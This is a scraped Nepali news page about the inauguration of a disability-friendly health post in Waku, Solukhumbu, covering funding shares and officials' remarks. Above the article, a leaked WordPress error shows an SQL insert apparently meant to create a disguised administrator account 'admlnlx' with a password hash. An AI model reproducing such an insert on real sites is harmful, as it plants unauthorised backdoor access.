WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiBbhXuneugl1SmBAzKRDUppgvTaXD/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:09:45', '', 'admlnlx', 'admlnlx')

वाकुमा बन्यो अपांगमैत्री स्वास्थ्य चौकी भवन – Gaule Khabar

वाकुमा बन्यो अपांगमैत्री स्वास्थ्य चौकी भवन

वाकुमा बन्यो अपांगमैत्री स्वास्थ्य चौकी भवन

काठमाण्डौ । सोलुखुम्बकोु माप्य दुधकोशी गाउँपालिका स्थित वाकुमा निर्मित अपांगमैत्री स्वास्थ्य चौकी भवनको उद्घाटन गरिएको छ ।एक करोड ८ लाख ९२ हजारको लागतमा सुविधाले भरिपुर्ण स्वास्थ्य चौकी भवन निर्माण गरिएको हो ।

भवन निर्माणमा माप्य दुधकोशी गाउँपालिकाले ४० लाख, वान हर्ट वल्र्ड वाइडले ३३ लाख, एक्सन फर नेपालले ३२ लाख ५० हजार र समुदायले ३ लाख ४२ हजार लागत साझेदारी गरेका छन् ।

नेकपा एमाले प्रदेश सचेतक तथा प्रदेश नं १ का सांसद बुद्धिकुमार राजभण्डारी, नेपालका लागि अष्ट्रेलियन राजदुत फेली सिटी भोल्क, गाउँपालिका अध्यक्ष बुद्धिकिरण राई, गाउँपालिका उपाध्यक्ष जुनिता माया मगरले संयुक्त रुपमा उद्घाटन गर्नुभएको हो । भवन उद्घाटनपछि प्रदेश सांसद बुद्धि कुमार राजभण्डारीले विकासमा राजनीति नगर्न आग्रह गरे ।

गाउँपालिका अध्यक्ष बुद्धि किरण राईले सुविधासम्पन्न भवन निर्माणसँगै प्रसुतिका लागि हेलिकप्टर चार्टर गर्नुपर्ने बाध्यताको अन्त्य भएको बताए ।आफू निर्बाचित भएपछी गाउँपालिकामा उल्लेखनीय बिकास भएको पालिका अध्यक्ष राइले बताए ।

गाउँपालिका उपाध्यक्ष जुनिता माया मगरले प्रसुति सेवा सहितको चुस्त सेवा प्रवाहमा स्थानीय सरकारले हर कोशिस गर्ने बताए ।

वन हर्ट वल्र्डवाइडका कार्यकारी निर्देशक सुर्य भट्टले गाउँपालिकाले आफुहरुलार्इ काममा पनि सहयोग र सहजीकरण गरेको भन्दै आगामी दिनमा पनि सहयोग गर्ने प्रतिबद्धता व्यक्त गरे ।

नेपालका लागि अष्ट्रेलियन राजदुत फेली सिटी भोल्कको समेत आतिथ्यतामा सम्पन्न कार्यक्रममा एक्सन फर नेपालका कार्यकारी निर्देशक ल्हाक्पा छिरिङ शेर्पा, वन हर्ट वल्र्डवाइडका कार्यकारी निर्देशक सुर्य भट्ट, गाउँपालिका वडा अक्ष्यक्षहरु दिनेस कुमार राई, सगुजित राई, नारायण काजी कार्की, नेकपा माओवादि केन्द्रको प्रदेश सदस्य गौरव राई, लगायतको उपस्थिति रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका